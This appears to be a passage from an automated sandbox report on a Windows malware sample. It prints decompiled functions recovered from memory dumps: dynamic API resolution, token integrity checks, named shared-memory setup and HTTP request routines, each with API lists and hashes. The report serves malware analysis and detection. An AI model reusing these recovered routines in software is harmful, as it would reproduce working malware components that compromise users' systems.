				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L01098214();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x109a348; // 0xa6d5a8
				_t5 = _t13 + 0x109b87a; // 0x1b08e22
				_t6 = _t13 + 0x109b594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L01097E7A();
				_t17 = CreateFileMappingW(0xffffffff, 0x109a34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x010974c4
0x010974cc
0x010974d0
0x010974d6
0x010974db
0x010974e0
0x010974e3
0x010974e6
0x010974eb
0x010974ec
0x010974ef
0x010974f4
0x010974fb
0x01097505
0x01097507
0x01097508
0x0109750b
0x01097527
0x0109752d
0x01097531
0x0109757f
0x01097533
0x01097540
0x01097550
0x01097558
0x0109756a
0x0109756e
0x00000000
0x00000000
0x0109755a
0x0109755d
0x01097562
0x01097564
0x01097564
0x01097542
0x01097544
0x01097570
0x01097571
0x01097571
0x01097540
0x01097586

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,01091D16,?,?,4D283A53,?,?), ref: 010974D0
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 010974E6
_snwprintf.NTDLL ref: 0109750B
CreateFileMappingW.KERNELBASE(000000FF,0109A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 01097527
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01091D16,?,?,4D283A53,?), ref: 01097539
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 01097550
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,01091D16,?,?,4D283A53), ref: 01097571
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01091D16,?,?,4D283A53,?), ref: 01097579

Strings

@MqtNqt, xrefs: 01097579

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @MqtNqt
API String ID: 1814172918-2883916605
Opcode ID: 8ada7d3a009a7505b82ea3e832b0198841bd870de973a8cc9e31353d2dcf62d1
Instruction ID: cb092e831202fd76b90a5582c0675bbc4acdcd3a4b33e87a6689ae2de431bd7a
Opcode Fuzzy Hash: 8ada7d3a009a7505b82ea3e832b0198841bd870de973a8cc9e31353d2dcf62d1
Instruction Fuzzy Hash: 18210572A00204BFDB619B68DC25FDE3BB9BB88714F204025F699E7290DAB19904DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0040189C Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E0040189C(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00401F60();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x403184;
				_push(_t15 + 0x40405e);
				_push(_t15 + 0x404054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00401F5A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x403188, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x0040189c
0x004018a5
0x004018a9
0x004018af
0x004018b4
0x004018b9
0x004018bc
0x004018bf
0x004018c4
0x004018c5
0x004018c8
0x004018d3
0x004018da
0x004018de
0x004018e0
0x004018e1
0x004018e4
0x004018e9
0x004018f3
0x004018f5
0x004018f5
0x00401909
0x0040190f
0x00401913
0x00401963
0x00401915
0x0040191e
0x00401934
0x0040193c
0x0040194e
0x00401952
0x00000000
0x00000000
0x0040193e
0x00401941
0x00401946
0x00401948
0x00401948
0x00401929
0x0040192b
0x00401954
0x00401955
0x00401955
0x0040191e
0x0040196b

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401ECA,0000000A,?,?), ref: 004018A9
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 004018BF
_snwprintf.NTDLL ref: 004018E4
CreateFileMappingW.KERNELBASE(000000FF,00403188,00000004,00000000,?,?), ref: 00401909
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401ECA,0000000A,?), ref: 00401920
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401934
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401ECA,0000000A,?), ref: 0040194C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401ECA,0000000A), ref: 00401955
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401ECA,0000000A,?), ref: 0040195D

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 236bc7e85519d2be923e6c4fcb0262230a58608b22daae9891fe3affc73656af
Instruction ID: 58fe537eb58d13a7eb712ddccc2dbb528511b1cce2bfb0581a2e4740ba176d57
Opcode Fuzzy Hash: 236bc7e85519d2be923e6c4fcb0262230a58608b22daae9891fe3affc73656af
Instruction Fuzzy Hash: B021A4B2600209BFD710AFA4CD88EAE37ADEB48354F114036F715F71E0D6745945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 01095663 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E01095663(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E010917ED(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E0109692B(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E0109692B(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E0109692B(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E0109692B(_t46);
				}
				return _t24;
			}

0x01095663
0x01095663
0x01095665
0x01095667
0x0109566e
0x01095675
0x01095675
0x0109567a
0x0109567d
0x01095684
0x0109568d
0x01095691
0x01095696
0x01095696
0x01095698
0x0109569d
0x010956a1
0x010956a6
0x010956a6
0x010956a8
0x010956ad
0x010956b1
0x010956b6
0x010956b6
0x010956b8
0x010956c3
0x010956c6
0x010956c6
0x010956c8
0x010956cd
0x010956d0
0x010956d0
0x010956d2
0x010956d9
0x010956dc
0x010956e1
0x010956e4
0x010956e4
0x010956e7
0x010956ec
0x010956ef
0x010956ef
0x010956f4
0x010956f8
0x010956fb
0x010956fb
0x01095700
0x01095705
0x00000000
0x01095708
0x0109570f

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 01095691
InternetCloseHandle.WININET(?), ref: 01095696
InternetSetStatusCallback.WININET(?,00000000), ref: 010956A1
InternetCloseHandle.WININET(?), ref: 010956A6
InternetSetStatusCallback.WININET(?,00000000), ref: 010956B1
InternetCloseHandle.WININET(?), ref: 010956B6
CloseHandle.KERNEL32(?,00000000,00000102,?,?,01095C05,?,?,747581D0,00000000,00000000), ref: 010956C6
CloseHandle.KERNEL32(?,00000000,00000102,?,?,01095C05,?,?,747581D0,00000000,00000000), ref: 010956D0

Part of subcall function 010917ED: WaitForMultipleObjects.KERNEL32(00000002,01097B88,00000000,01097B88,?,?,?,01097B88,0000EA60), ref: 01091808

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
String ID:
API String ID: 2824497044-0
Opcode ID: 32e01e4363bce311ec0748d123050f971d1d917f3ad440b88457b70a94c28077
Instruction ID: a7b85438dd80f8abb954795470b674985bc2d0e9dca3e83f0bff65917f66c452
Opcode Fuzzy Hash: 32e01e4363bce311ec0748d123050f971d1d917f3ad440b88457b70a94c28077
Instruction Fuzzy Hash: 7B116A76600748ABCB31AFABFCA4C4BBBEDBF582043550D5AE2D6D3510C735F8449AA4

Uniqueness

Uniqueness Score: -1.00%

Function 010930E2 Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E010930E2(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x109a2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E01096A51(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E0109692B(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x010930ef
0x010930f6
0x010930fd
0x01093111
0x0109311c
0x01093134
0x01093141
0x01093144
0x01093149
0x01093154
0x01093158
0x01093167
0x0109316b
0x01093187
0x01093187
0x0109318b
0x0109318b
0x01093190
0x01093194
0x0109319a
0x0109319b
0x010931a2
0x010931a8

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01093114
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 01093134
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 01093144
CloseHandle.KERNEL32(00000000), ref: 01093194

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 01093167
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0109316F
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0109317F

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: c0096c28d065258c58e97663d0ff4410c7bdfbf81b60396bf4f4c327060f75c8
Instruction ID: fb247928cf1e3c88a4ae617016f8a49924c03cd47941dab47a4498ffc55861cb
Opcode Fuzzy Hash: c0096c28d065258c58e97663d0ff4410c7bdfbf81b60396bf4f4c327060f75c8
Instruction Fuzzy Hash: E42119B5900219FFEF109FA4DC54EEEBBB9FB48304F0000A5FA51A6160C7769A54EF60

Uniqueness

Uniqueness Score: -1.00%

Function 0109581D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E0109581D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x109a348; // 0xa6d5a8
				_t1 = _t9 + 0x109b624; // 0x253d7325
				_t36 = 0;
				_t28 = E01097877(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x1b09601
					_t40 = E01096A51(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E01095DB1(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E0109692B(_t40);
						_t42 = E01093DC1(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E0109692B(_t36);
							_t36 = _t42;
						}
						_t43 = E0109229C(_t36, _t33);
						if(_t43 != 0) {
							E0109692B(_t36);
							_t36 = _t43;
						}
					}
					E0109692B(_t28);
				}
				return _t36;
			}

0x0109581d
0x01095820
0x01095821
0x01095828
0x0109582f
0x01095836
0x0109583a
0x01095841
0x01095848
0x0109584d
0x01095855
0x0109585f
0x01095863
0x01095867
0x0109586d
0x01095872
0x0109587c
0x01095882
0x01095884
0x0109589b
0x0109589f
0x010958a2
0x010958a7
0x010958a7
0x010958b0
0x010958b4
0x010958b7
0x010958bc
0x010958bc
0x010958b4
0x010958bf
0x010958c4
0x010958ca

APIs

Part of subcall function 01097877: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01095836,253D7325,00000000,00000000,?,775EC740,0109384E), ref: 010978DE
Part of subcall function 01097877: sprintf.NTDLL ref: 010978FF

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095848
lstrlen.KERNEL32(00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095850

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

strcpy.NTDLL ref: 01095867
lstrcat.KERNEL32(00000000,00000000), ref: 01095872

Part of subcall function 01095DB1: lstrlen.KERNEL32(00000000,00000000,0109384E,00000000,?,01095881,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 01095DC2

Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 0109588F

Part of subcall function 01093DC1: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,0109589B,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01093DCB
Part of subcall function 01093DC1: _snprintf.NTDLL ref: 01093E29

Strings

=, xrefs: 01095889

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 040b2a3b314d881eda92dd67b3edd20a0d81b5252da5aeb2c4f4d8fb2b6a7c80
Instruction ID: 0d38b185edc9f50249fe48b9d4f24f23131cc467d750cee890a21d9ba8135c6a
Opcode Fuzzy Hash: 040b2a3b314d881eda92dd67b3edd20a0d81b5252da5aeb2c4f4d8fb2b6a7c80
Instruction Fuzzy Hash: 0311C6335011267B5F1277B99CB4CEF3BDD9F995543050056FA81AB104DE79DC02A7E0

Uniqueness

Uniqueness Score: -1.00%

Function 004013FB Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004013FB(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E00401F0B(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x403184 + 0x404014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x403184 + 0x404151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E004013E6(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x403184 + 0x404161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x403184 + 0x404174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x403184 + 0x404189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x403184 + 0x40419f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00401B6A(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00401409
0x0040140d
0x004014ce
0x00401413
0x0040142b
0x0040143a
0x00401441
0x00401443
0x00401448
0x004014c6
0x004014c7
0x0040144a
0x00401457
0x00401459
0x0040145e
0x00000000
0x00401460
0x0040146d
0x0040146f
0x00401474
0x00000000
0x00401476
0x00401483
0x00401485
0x0040148a
0x00000000
0x0040148c
0x00401499
0x0040149b
0x004014a0
0x00000000
0x004014a2
0x004014a8
0x004014ae
0x004014b3
0x004014b8
0x004014bd
0x00000000
0x004014bf
0x004014c2
0x004014c2
0x004014bd
0x004014a0
0x0040148a
0x00401474
0x0040145e
0x00401448
0x004014dc

APIs

Part of subcall function 00401F0B: RtlAllocateHeap.NTDLL(00000000,?,0040119F,00000030,?,00000000), ref: 00401F17

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,0040151B,?,?,?,?,?,00000002,?,?), ref: 0040141F
GetProcAddress.KERNEL32(00000000,?), ref: 00401441
GetProcAddress.KERNEL32(00000000,?), ref: 00401457
GetProcAddress.KERNEL32(00000000,?), ref: 0040146D
GetProcAddress.KERNEL32(00000000,?), ref: 00401483
GetProcAddress.KERNEL32(00000000,?), ref: 00401499

Part of subcall function 00401B6A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401BC7
Part of subcall function 00401B6A: memset.NTDLL ref: 00401BE9

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: acea6eece1d5ae864dd672754777c824f0b556606ebdacff0ea342eea23e8c8a
Instruction ID: 450e7f49be0a20eebf8d2adf2def030f8a7faa26dc07ecb248e956a79a49ed05
Opcode Fuzzy Hash: acea6eece1d5ae864dd672754777c824f0b556606ebdacff0ea342eea23e8c8a
Instruction Fuzzy Hash: 2D214FB060060BAFD710DF6ACE84D66B7FCAF54300701457AE909EB371EB74E9008B68

Uniqueness

Uniqueness Score: -1.00%

Function 010947B2 Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E010947B2(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E010955B2(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E01097AC4(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x010947b2
0x010947bf
0x010947c1
0x01094824
0x00000000
0x01094824
0x010947d9
0x010947e0
0x010947ec
0x010947f1
0x01094807
0x01094817
0x00000000
0x01094809
0x01094809
0x01094810
0x0109481d
0x0109481d
0x0109481d
0x01094810
0x01094807
0x01094822
0x00000000
0x00000000
0x01094828

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,01095BA4,?,?,747581D0,00000000), ref: 010947EC
ResetEvent.KERNEL32(?), ref: 010947F1
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 010947FE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?,?), ref: 01094809
GetLastError.KERNEL32(?,?,00000102,01095BA4,?,?,747581D0,00000000), ref: 01094824

Part of subcall function 010955B2: lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,010947D1,?,?,?,?,00000102,01095BA4,?,?,747581D0), ref: 010955BE
Part of subcall function 010955B2: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,010947D1,?,?,?,?,00000102,01095BA4,?), ref: 0109561C
Part of subcall function 010955B2: lstrcpy.KERNEL32(00000000,00000000), ref: 0109562C

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?), ref: 01094817

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: 4df602af54c9f9d1518d1cf9606c43ef559e0d367b0de060eb759c91a6e821a3
Instruction ID: abf06f51975cc7b1cd1655483a5cf7a54e933a76406f6bd013b3d4f1a31e588d
Opcode Fuzzy Hash: 4df602af54c9f9d1518d1cf9606c43ef559e0d367b0de060eb759c91a6e821a3
Instruction Fuzzy Hash: AB01DF31104241AFDF316A65DD24F1F7AE4BF88764F104625F2E1D50E1D621E402EA20

Uniqueness

Uniqueness Score: -1.00%

Function 0109460D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0109460D(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x109a3cc; // 0x1b09600
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x109a3cc; // 0x1b09600
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x109a030) {
					HeapFree( *0x109a2d8, 0, _t8);
				}
				_t9 = E01093297(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x109a3cc; // 0x1b09600
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x0109460d
0x0109460d
0x01094616
0x01094626
0x01094626
0x0109462b
0x01094630
0x00000000
0x00000000
0x01094620
0x01094620
0x01094632
0x01094636
0x01094648
0x01094648
0x01094653
0x01094658
0x0109465b
0x01094660
0x01094664
0x0109466a

APIs

RtlEnterCriticalSection.NTDLL(01B095C0), ref: 01094616
Sleep.KERNEL32(0000000A), ref: 01094620
HeapFree.KERNEL32(00000000,00000000), ref: 01094648
RtlLeaveCriticalSection.NTDLL(01B095C0), ref: 01094664

Strings

Uqt, xrefs: 01094648

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
